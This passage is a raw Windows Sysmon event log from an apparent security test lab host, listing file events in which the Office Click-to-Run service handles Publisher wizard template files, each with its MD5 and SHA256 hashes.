Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGMASTHD.DPVMD5=CF3BC79FD30DC54C55E1D4F261D2E98A,SHA256=E8D5927F552C0412448477B4F6F72D6072CDDFFABB59CB486981343AF59D3731,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069576Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGMARQ.XMLMD5=9CE6F1FF729DC0459A9395DEBA750A7C,SHA256=928F6B2DCA17102B27F1FB0C4E511A968A538CCB466C176D674D5836B75A8EF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069575Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGMARQ.DPVMD5=AE3BF4559C39C1B85A5275A271FAC3E6,SHA256=7992061D57BE54A8F36AF1E784FE03F2F14369C20162F3B3A8731DF0890B9220,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069574Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGMAIN.XMLMD5=1564BCF598F5BCACB74FD9F2D7AFF247,SHA256=136FFF2841F0FFBBEA01ACB25DAB3A91C0856124477F046DF477C30291A6A4D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069573Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGLOGO.XMLMD5=C6ADA538BB1B05BA2B94EAB959A0437D,SHA256=A0C20935428B12BEEA28E3C18ACF9A375CEEC2480B81AC1FF91814AB53C5A201,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069572Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGLOGO.DPVMD5=01107CE4D0A614311B5C38CA44D7E05F,SHA256=6456EB1F6774EE19C618EE35AED0C05277DC084327900343CFB7A8D0F1E108E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069571Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGLINACC.XMLMD5=3A625596ED304D9F7C736791F5143FB8,SHA256=09F518091375D81724EBDD2109DE6CE7CACA6C577918B34EC25C04D1760464C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069570Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGLINACC.DPVMD5=29E79D13A2D5921354D404C581B9A75F,SHA256=BE98973FCCD02D9D6513EA46FA9F6F1F2044B8954BCEA099E8ACB7E008D6F99C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069569Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGHEADING.XMLMD5=586EF30915931E83C88BCB38047C4722,SHA256=D400603A00B669514645F5573304E24B5E73A985FDCA26C5255D141829BC1082,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069568Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGDOTS.XMLMD5=BEE828211F217A8340865BF581F59AD1,SHA256=C319BFCAAB1D02199F4404C53B74AC883AE71065930955AC363DEEAC6F859024,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069567Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGDOTS.DPVMD5=71C266C45A53908B1C3473F3110CC48E,SHA256=599B3BAC32772E9C27A9F30B05F61FE5ED74528A9A0D2C963D02382E06BD47D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069566Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGCOUPON.XMLMD5=8C36730BF9AE1F78609E512BD5B82A5E,SHA256=D5CB29177A36E0599F910F57A783E4B6E6DDA5AB298B11D07F473FDE421461E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069565Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGCOUPON.DPVMD5=C0CCE6FD80ECC7586237CEBF4AE60FE8,SHA256=35D886EF1D1BAC4B6347AF903C88FF8EC95ACCEDA7F8F23F0A5A411BB5AC2A49,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069564Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGCINFO.XMLMD5=C80F1E09C5A4608C4A1C48BCC43090BA,SHA256=38477C01C3F3864BFBCB082A760FC83DFBF82CBD812A6F4AF8CCBFCF2253598C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069563Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGCHKBRD.XMLMD5=B2EE4C8CC1B985975BF8B51B265F1A45,SHA256=DA1390A83A6F80CBD2D31878F6E13FC787503160DC60A27EBF04B64B1F8721CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069562Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGCHKBRD.DPVMD5=E42D9B1A47FEA8BA3D7B947E2CE78C78,SHA256=68D05BEA0C8D88BBF0E0E517AF6036B13D9D2FA0C66C60A0C3DD0C31DA044410,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069561Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGCAL.XMLMD5=E9D493E39D7ABD7DDDFF65F391D2518F,SHA256=05F71566322DCBFD2F67521DD9F4128D55671C4FB800B21476A0102D896B1F29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069560Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGCAL.DPVMD5=936B578C48A8D4FA48BB409BA47ACD66,SHA256=6CE9AB955AF87C6550AEBD359D92C3E435AFB69DB6A8236F96130FC6283424B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069559Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGBOXES.XMLMD5=26BB550C932464F4689686B644C942A4,SHA256=2AFA21526A96940911568BAC1CAA43BF3254AF7EEAEBA88B9CD32FEDFC77BBBB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069558Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGBOXES.DPVMD5=B8DECFDEDD0F5391F908BA6003C34151,SHA256=67C8D00AA1E967010ADA40D6E86EC6D20454F81FBC43833D3A3A9E9B6BCE454A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069557Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGBORDER.XMLMD5=1A55946DDD2A16C62A16E8DF7DFAA610,SHA256=2BDFBEF5FE3C7C866C4E88674CD73AE76261DFBAC70F469F96133D00ED6970FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069556Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGBORDER.DPVMD5=A49659B42E8E2D2A2CCA180ACFA30D92,SHA256=A94A9F6683DF1F2DF1B40A1FB96D59835136A2A8E936CDE4A71122A3F4D1A404,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069555Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGBARBLL.XMLMD5=80C5BC454689068631A8752257C77D76,SHA256=236579FCF46595B32C2B9AF2B192C2CED78552C50E85F6B522F8FB073FACB7D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069554Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGBARBLL.DPVMD5=7AA27DE6F0DB431F6DDBA5FD35088FA9,SHA256=164BC353D91CF72067725539C59BA515A46AB45765AF47D7A04CF4DB803F72C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069553Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGATNGET.XMLMD5=6B16558764B0EBC4835517F2B3E21D97,SHA256=99BB0CF749969E85B4107112B4E992DA9D2E7F33BF70EA733C33B10291A0D506,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069552Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGATNGET.DPVMD5=CB0106F619F449EDAB3C15BE99D04AE3,SHA256=A917F1853A286C61E126B44279B76A5789117B4C85D3E8EE4849A9827D16F777,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069551Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGAD.XMLMD5=AF2AEEEE9CEE636BBC33B410799B58D4,SHA256=C6BF9D8024AC91246A3CC808DBB7D71D96BC84F29EFAADB021D46D38D25CD28F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069550Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGAD.DPVMD5=D3BBE56EC6D466624B28A565137210F1,SHA256=91B0F91846FE695149FE82746C83D9AECEA81980406BC16BE001F5E66B21D6F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069549Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGACCBOX.XMLMD5=F3A7B3320BA63D4DBD6A30552C2CF6D1,SHA256=C0DA0964A0A5FC3A1D0148D5637880E8F0697BB7F4CFDB0F2941AB64CEFE31C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069548Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGACCBOX.DPVMD5=71500ED543437693EEFA039A1F6A5184,SHA256=8CECCB7E6D2EDB335BB4FF65055DF629562067D97FF53E978D2580586834EAAB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069547Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGACCBAR.XMLMD5=3AC408515717FDA6D77C0084151FC70F,SHA256=2393CB89879C8863AE359E49EAC162CE502AE3B5C694BACE27A61AC63755381D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069546Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGACCBAR.DPVMD5=3F96CCE33F032EBFB4F684FDA933CDC5,SHA256=F5561C9A741A40EC4CA71112FFACF41E7EDA38D5492B9B070BB317C375475C13,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069545Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\COUPON.POCMD5=064537069BB8218DCFF613BF53C8D324,SHA256=570C0FE15406459C52464F42C9567A0CAA6A29976CBA03BC27B88DE7C35EACAD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069544Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\CONTACTINFOBB.POCMD5=6A060AF8557351098BB6136BBE3123A7,SHA256=7D90A3103F89127AEA0AF7DB94ED6BC070AFF62A238473D7610AC2C8C8831147,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069543Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\CONTACTINFOBB.DPVMD5=DF0805C52F4FF5E9FED558E0FA05EB9A,SHA256=062EED94A0C3640D003C0A8E8B1C85B79D1C52EBEB25373C494923CBF39C9277,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069542Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\CHECKER.POCMD5=0E72AC80B6FAC87AB5A79FB42349FC95,SHA256=BA42B3306D5E4B78007E90F116107DF4C8919576A67A9AF4E76F6D208F66062A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069541Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\CERT98SP.POCMD5=7B7240AA790548F35E9F6416DCB05AD8,SHA256=D1D296FD1D186699E28A8626425E36D84F8A48040F201096A070A3476477C754,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069540Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\CERT98.POCMD5=DA69A1A5C781C85EA59B90D92FB53DEF,SHA256=7C60A6107BA7DB4172291A8734C047223C58F4A727EBB4F797BC1D99E15498FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069539Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\CERT.XMLMD5=38B48F00283C82AF264B5ECDF0E3F4AF,SHA256=7E71194052F3D45CBC0C7A3B19FDE785B68AEED98BDE80E3CEB7716F1065619E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069538Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\CERT.DPVMD5=8E907E5020C5F994CC3A8360DF6A1B75,SHA256=BD1D1C91FE33AE2366186C72236B79CC231B74C5CAB70EF2461F565E8258B84A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069537Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\CATWIZ11.POCMD5=1EFF94A703F42A0F0A332D5F45EDE419,SHA256=9A6BD13C3A2DD69D91B7A24EBCF4881760C0CE4494FD50A2E574C3F40EBF1F06,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069536Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\CATWIZ.POCMD5=7CFD49AF25B1988A4791BAF0A380C4EA,SHA256=69DFE1B3BCEAD91EC6148A1393297F2F83CDC51076AD07C763C45A409DF5C08F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069535Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\CATALOG.XMLMD5=97045A9C3430270A1A1DABBD845BB1F3,SHA256=7FC0A5C8D0F04F0A5AC2CE6D083505818F38F37BFA09BA5DD560C22442E0F25B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069534Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\CATALOG.DPVMD5=837BD5E26309ED10053577BA337F0FAC,SHA256=7E052230A3FE518F78FCC76C46DD7834BFF4FE7DD436757E18416C8D062C5B64,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069533Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\CALSO98.POCMD5=0085BEE5CB21D1E18C9731FBAD0F706B,SHA256=889A265F8D950DB953F75843EEB9449D2E5D1A6C59CFC06647A7079EE905D481,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069532Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft 